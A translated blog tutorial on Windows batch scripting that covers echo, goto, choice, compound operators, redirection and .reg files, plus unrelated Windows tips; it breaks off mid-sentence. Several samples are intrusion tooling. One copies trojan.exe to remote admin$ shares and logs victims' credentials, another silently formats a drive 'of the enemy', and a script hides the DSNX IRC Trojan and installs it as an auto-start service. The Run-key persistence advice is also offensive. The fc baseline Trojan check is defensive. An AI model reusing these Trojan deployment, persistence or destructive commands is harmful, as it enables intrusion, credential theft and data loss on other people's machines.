Advanced application of batch processing

xiaoxiao, 2021-03-06

Advanced Application of Batch (1)

1. Simple batch: advanced use of the internal commands. Tips everyone is familiar with! A few batch knowledge points:

1: Use the FC command to check for Trojans. First create a batch file ATM.BAT with this code:

    @echo off
    dir c:\windows\system32\*.exe > c:\??.txt
    dir c:\windows\system32\*.dll > c:\??.txt

2: Create a batch file WLTS.BAT with this code:

    @echo off
    dir c:\windows\system32\*.exe > c:\findexe.txt
    dir c:\windows\system32\*.dll > c:\finddll.txt
    fc c:\??.txt c:\findexe.txt > c:\exe.txt
    fc c:\??.txt c:\finddll.txt > c:\dll.txt

Run atm.bat on your machine first. Later, when you suspect a Trojan is running, run WLTS.BAT and look in c:\exe.txt and c:\dll.txt: the suspicious files show up there. This is only one way of thinking about it! You can also use the same idea to find the junk left behind when you uninstall software, for example in the registry.

2: Make a virtual drive with the subst command. Example: subst x: c:\111, where X: is the drive letter to create and 111 is the folder.

3: Use the subst command to hide the 3.5" drive: subst h: c:\atm, and set the ATM folder to read-only. To restore: Start - Run - subst a: /d.

1. echo command: turns the command-echoing feature on or off, or displays a message. With no parameters, echo displays the current echo setting.

Syntax: echo [{on|off}] [message]

Sample:

    @echo off
    echo hello world

In practice we combine this command with the redirection symbols (>, >>, with ^ as the escape character) so that commands can be written out to a file in a specific format. This comes up in the later examples.

2. @ command: the @ hides the command that follows it, so the command is not displayed. During an intrusion (for example, using a batch file to format the enemy's hard drive) you naturally don't want the other side to see the command you used.

Sample:

    @echo off
    @echo Now initializing the program...
    @format x: /q /u /autotest

(format does not accept /y; fortunately Microsoft left us this parameter, whose effect is the same as /y.)

3. goto command: jumps to a label. Once the label is found, the program continues with the command on the line after it.

Syntax: goto label (label is the line in the batch program you want to jump to.)

Sample:

    if {%1}=={} goto noparms
    if {%2}=={} goto noparms

(If you don't yet understand the if, %1 and %2 here, skip over them for now; they are explained in detail later.) Give labels meaningful names and put a colon in front of the name: the colon marks the word as a label, and it is what goto looks for to find where to continue. It is also good to add a comment so that others understand your intention.

4. rem command: a comment, equivalent to /* ... */ in C. It is not executed; it only documents the script so it is easy to read and modify later.

Syntax: rem message

Sample: @rem Here is the description.

5. pause command: when pause runs, the message "Press any key to continue..." is displayed.

Sample:

    @echo off
    :begin
    copy a:*.* d:\back
    echo Please put a new disk into drive A
    pause
    goto begin

In this example, all files on the disk in drive A are copied to d:\back. The message then prompts you to put another disk into drive A, and pause suspends the program so that you can swap disks and press any key to continue.

6. call command: calls one batch program from another without terminating the parent batch program. call also accepts a label as the call target. Used outside a script or batch file, call has no effect at the command line.

Syntax: call [[drive:][path]filename [batchparameters]] [:label [arguments]]

Parameters: [drive:][path]filename specifies the location and name of the batch program to call.

The filename parameter must have a .bat or .cmd extension.

7. start command: launches an external program; all DOS commands and command-line programs can be run through start. Commonly used parameters:

    MIN         start the window minimized
    SEPARATE    start a 16-bit Windows program in a separate memory space
    HIGH        start the application in the HIGH priority class
    REALTIME    start the application in the REALTIME priority class
    WAIT        start the application and wait for it to terminate
    parameters  the parameters passed to the command or program

If the command executed is a 32-bit GUI application, cmd.exe does not wait for the application to terminate before returning to the command prompt. This does not happen when the command is executed from within a command script.

8. choice command: lets the user type a character to choose which commands run. Add the /c: parameter followed by the characters that may be entered, with no spaces between them. The return code (errorlevel) is 1, 2, 3, ... in the order of the characters. For example, choice /c:dme defrag,mem,end displays defrag,mem,end[D,M,E]?

Sample (sample.bat):

    @echo off
    choice /c:dme defrag,mem,end
    if errorlevel 3 goto end
    if errorlevel 2 goto mem
    if errorlevel 1 goto defrag
    :defrag
    c:\dos\defrag
    goto end
    :mem
    mem
    goto end
    :end
    echo good bye

(Test the highest errorlevel value first: "if errorlevel N" is true for every return code greater than or equal to N.) After this file runs, defrag,mem,end[D,M,E]? is displayed and the user may press D, M or E. The if statements then decide: D runs the block at label defrag, M the block at label mem, and E the block at label end. Each block finishes with goto end, after which the program displays good bye and the file ends.

Advanced Application of Batch (2)

3. How to use compound commands

1. & usage: first command & second command [& third command ...]

Runs several commands on one line; they are executed in order, regardless of whether the earlier ones fail.

Sample:

    C:\>dir z: & dir c:\ex4rch
    The system cannot find the path specified.
     Volume in drive C has no label.
     Volume Serial Number is 0078-59FB

     Directory of C:\ex4rch

    2002-05-14  23:51       <DIR>          .
    2002-05-14  23:51       <DIR>          ..
    2002-05-14  23:51                   14 sometips.gif

2. && usage: first command && second command [&& third command ...]

Runs several commands on one line, but stops at the first command that fails; if none fails, all of them are executed.

Sample:

    C:\>dir z: && dir c:\ex4rch
    The system cannot find the path specified.

    C:\>dir c:\ex4rch && dir z:
     Volume in drive C has no label.
     Volume Serial Number is 0078-59FB

     Directory of C:\ex4rch

    2002-05-14  23:55       <DIR>          .
    2002-05-14  23:55       <DIR>          ..
    2002-05-14  23:55                   14 sometips.gif
                   1 File(s)             14 bytes
                   2 Dir(s)     768,671,744 bytes free
    The system cannot find the path specified.

This is handy when doing backups, for example:

    dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb e:\backup

If backup.mdb exists on the remote server, copy runs; if the file does not exist, copy is not executed.

This usage can replace if exist :)

3. || usage: first command || second command [|| third command ...]

Runs several commands on one line, but stops after the first command that succeeds; if no command succeeds, all of them are executed.

Sample:

    c:\ex4rch>dir sometips.gif || del sometips.gif
     Volume in drive C has no label.
     Volume Serial Number is 0078-59FB

     Directory of C:\ex4rch

    2002-05-14  23:55                   14 sometips.gif
                   1 File(s)             14 bytes
                   0 Dir(s)     768,696,320 bytes free

The operators combined, sample:

    @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 user %2 pass %3 >> victim.txt

4. | usage: first command | second command [| third command ...]

Feeds the output of the first command to the second command as its input; you will remember this is very common on Unix.

Sample:

    time /t > d:\ip.log
    netstat -n -p tcp | find ":3389" >> d:\ip.log
    start explorer

Terminal Services lets us set a custom start program for a user, so the batch file above can record the IP of the user who logs in.

2. > and >> output redirection: redirects the output of a command or program to a specified file. The difference between them: > replaces the contents of the file with the output, while >> appends the output to the file without changing what is already there.

Sample1: echo hello world > c:\hello.txt (a silly example?)

Sample2: DLL Trojans are everywhere. We know that system32 is a good place to hide, and many Trojans have headed there; DLL Trojans are no exception.
To deal with this, after installing the system and the necessary applications, record the EXE and DLL files in that directory: run cmd, change to system32, and run dir *.exe > exeback.txt & dir *.dll > dllback.txt. The names of all EXE and DLL files are now recorded in exeback.txt and dllback.txt. Later, if something seems wrong and the traditional methods find nothing, consider whether a DLL Trojan has sneaked into the system. Record the exe and dll files under system32 again with the same command, into exeback1.txt and dllback1.txt, then run:

    fc exeback.txt exeback1.txt > diff.txt & fc dllback.txt dllback1.txt >> diff.txt

(fc compares the DLL and EXE lists from before and after, and the result goes into diff.txt.) This shows the extra DLL and EXE files, and by looking at their creation time, version, whether they are packed, and so on, it is easy to decide whether a DLL Trojan has been planted.
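The baseline-and-compare check just described (and the ATM.BAT / WLTS.BAT version in part 1), as an added example that is not code from the original post, written with the &&, || and | operators from the compound-command section and the label/goto/%1 pattern from part 1. It assumes a hypothetical baseline folder %USERPROFILE%\sysbase; run it once as "sysbase.bat baseline", then as "sysbase.bat check" whenever something looks wrong:

```batch
@echo off
rem Added example, not code from the original post: the fc baseline check described
rem above, written with the &&, || and | operators from the compound-command section.
rem Assumed: baseline lists are kept in %USERPROFILE%\sysbase (hypothetical path).
setlocal
set "BASE=%USERPROFILE%\sysbase"
set "SYS=%SystemRoot%\System32"
if not exist "%BASE%" mkdir "%BASE%"
if /i "%~1"=="baseline" goto baseline
if /i "%~1"=="check" goto check
echo Usage: %~nx0 baseline ^| check
goto end

:baseline
rem dir /b lists bare names (no dates or free-space lines, which would always differ);
rem the | feeds them to sort so both lists are in a stable order for fc.
dir /b /a-d "%SYS%\*.exe" | sort > "%BASE%\exeback.txt"
dir /b /a-d "%SYS%\*.dll" | sort > "%BASE%\dllback.txt"
echo Baseline of %SYS% saved to "%BASE%" on %date% %time%
goto end

:check
if not exist "%BASE%\exeback.txt" (echo No baseline yet, run "%~nx0 baseline" first & goto end)
dir /b /a-d "%SYS%\*.exe" | sort > "%BASE%\exeback1.txt"
dir /b /a-d "%SYS%\*.dll" | sort > "%BASE%\dllback1.txt"
rem The first fc uses > to create diff.txt, the second >> to append to it.
rem fc exit code 2 means a list could not be opened: || stops the check right there.
fc "%BASE%\exeback.txt" "%BASE%\exeback1.txt" > "%BASE%\diff.txt" || if errorlevel 2 goto fcerror
fc "%BASE%\dllback.txt" "%BASE%\dllback1.txt" >> "%BASE%\diff.txt" || if errorlevel 2 goto fcerror
rem fc marks every differing name with a line starting *****; find returns 0 when it
rem sees one, so && reports differences and || reports a clean result.
find "*****" "%BASE%\diff.txt" >nul && echo Differences found, review "%BASE%\diff.txt" || echo No new or missing EXE/DLL files in %SYS%
goto end

:fcerror
echo fc could not open one of the lists in "%BASE%"
:end
endlocal
```

The names in diff.txt are only candidates: as the text says, check each file's creation time, version, signer and packing before deciding anything.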

If there is one, don't delete it directly: first unregister the backdoor DLL with regsvr32 /u trojan.dll, then move it to the Recycle Bin; if the system shows no abnormal reaction, delete it completely or submit it to an anti-virus vendor.

3. <, >&, <&: >& writes the output of one handle to the input of another handle; <& reads input from one handle and writes it to the output of another handle. These are rarely used, so they are not covered further.

5. How to operate the registry from batch files

During an intrusion we frequently operate on a specific registry key, for example to hide a backdoor, to remove a Trojan's leftover Run values, or to create a service that loads the backdoor. Of course, we also modify the registry to harden the system or to change a system property, which requires some understanding of registry operations. Let's look at how to operate the registry with .reg files (batch can generate .reg files). The common registry operations are create, modify and delete.

1. Create. Creation comes in two kinds. The first is creating a subkey. We create a file with the following content:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Hacker]

After running this script, a subkey named "Hacker" exists under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft. The other kind is creating values. The file format is the standard one, the same as a file exported from the registry. The content is as follows:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Invader"="ex4rch"
    "door"="c:\\winnt\\system32\\door.exe"
    "autodos"=dword:02

This creates three values under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door and Autodos. Invader is a string value, Door is a REG_SZ value, and Autodos is a DWORD value.

2. Modify. Modification is relatively simple: export the values you need to modify, edit the file with Notepad, then import it again (regedit /s).

3. Delete. First, deleting a value. We create a file:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "ex4rch"=-

After this script runs, the value "ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted. Now deleting a subkey; we create a script:

    Windows Registry Editor Version 5.00

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

After this script runs, the key [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted.

I believe you have now mastered .reg files. The next goal is to create .reg files from batch; remember that the redirection symbols introduced earlier make it easy to create files of a specific type.

Sample1: to generate the following registry file,

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Invader"="ex4rch"
    "Door"=hex:255
    "Autodos"=dword:000000128

write it like this (the first echo uses > to create the file, the rest use >> to append to it):

    @echo Windows Registry Editor Version 5.00 > sample.reg
    @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> sample.reg
    @echo "Invader"="ex4rch" >> sample.reg
    @echo "Door"=hex:255 >> sample.reg
    @echo "Autodos"=dword:000000128 >> sample.reg
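The .reg-from-batch technique above as an added example that is not code from the original post: it removes one value from the Run key with the "name"=- syntax, exporting the key first so the change can be reverted. The value name passed as %1 and the file names under %TEMP% are assumptions; regedit /s needs an administrator prompt to write under HKLM.

```batch
@echo off
rem Added example, not code from the original post: generate a .reg file with echo
rem and redirection as shown above, then import it silently with regedit /s.
rem It removes one Run value (the "name"=- syntax) after exporting the key as a
rem backup. The value name comes from %1 (hypothetical; no real sample is meant).
setlocal
set "KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
set "REGFILE=%TEMP%\remove_run_value.reg"
set "BACKUP=%TEMP%\run_backup.reg"
if "%~1"=="" (
    echo Usage: %~nx0 ValueName
    goto end
)

rem Backup first: reg export writes the whole key to a .reg file that can be
rem re-imported with regedit /s if the removal turns out to be wrong (/y = overwrite).
reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "%BACKUP%" /y >nul
if errorlevel 1 (echo Could not export %KEY% & goto end)

rem The redirection is written before the text on purpose: "5.00> file" would be
rem parsed by cmd as a redirect of handle 0 and the line would lose its last digit.
rem The first line uses > to create the file, every later line >> to append.
>"%REGFILE%"  echo Windows Registry Editor Version 5.00
>>"%REGFILE%" echo.
>>"%REGFILE%" echo [%KEY%]
>>"%REGFILE%" echo "%~1"=-

echo Generated "%REGFILE%":
type "%REGFILE%"
regedit /s "%REGFILE%"
del "%REGFILE%"
echo Removed value "%~1" from Run; backup of the key is in "%BACKUP%"
:end
endlocal
```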

Sample2: with some older Trojans we may generate a Run value to make the Trojan start. But that easily exposes the Trojan's path and gets it killed; registering the Trojan as a system service is relatively safer. Below, the IRC Trojan DSNX is used as the example (renamed windrv32.exe):

    @start windrv32.exe
    @attrib +h +r windrv32.exe
    @echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >> patch.dll
    @echo "windsnx"=- >> patch.dll
    @sc.exe create windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
    @regedit /s patch.dll
    @del patch.dll
    @rem [delete the DSNXDE startup item from the registry, register it as a system-critical service with sc.exe, set its attributes to hidden and read-only, and configure it to start at boot]
    @rem Isn't that safer? ^_^

Some very good tricks! (They can be called classic.)

1. If many windows are open and you want to close them all, hold Shift and click the Close icon in the upper right corner of one window.

2. Press Esc before saving a page (or saving it for offline use); it is much faster.

3. Listen to CDs without any player software: plug the speaker cable directly into the headphone jack of the optical drive, insert the CD, and press the Play button on the CD-ROM drive. Listening this way uses no system resources. (If your computer is broken, won't start and can't be repaired, don't waste the parts: use the power supply to power the optical drive and you have a temporary CD player.)

4. In MSN, Enter sends the message; to insert a line break, press Shift+Enter or Ctrl+Enter.

5. The browser's address bar can test a short piece of HTML: type about:ABC in the address bar, press Enter, and you see the effect.

6. Windows shortcuts:
   Win+M: show the desktop
   Win+Pause: System Properties
   Quick restart: hold Shift when clicking OK (not for 2000/XP)
   Delete without the Recycle Bin: Shift+Del
   Disc autorun: hold Shift
   Ctrl+Esc: same as the Start button or the Win key
   Ctrl+Home: move the cursor to the beginning of the text area (Home alone: beginning of the line)
   Ctrl+End: move the cursor to the end of the text area (End alone: end of the line)
   Alt+F4: close the current window (pressed on the desktop, it shuts down)
   F2: rename
   Win+E: Explorer
   Win+R: Run
   Win+F: Find
   Win+U: shut down the system
   Win+D: minimize all windows; press Win+D again to restore them
   Win+M: minimize all windows, but a single click brings back the previous window
   Shift+F10: open the right-click menu of the selected item
   Ctrl+Shift while dragging a file: create a shortcut

7. Shutdown shortcut: (1) right-click an empty spot on the desktop -> New -> Shortcut; (2) for the location type rundll.exe user.exe,ExitWindows; (3) In
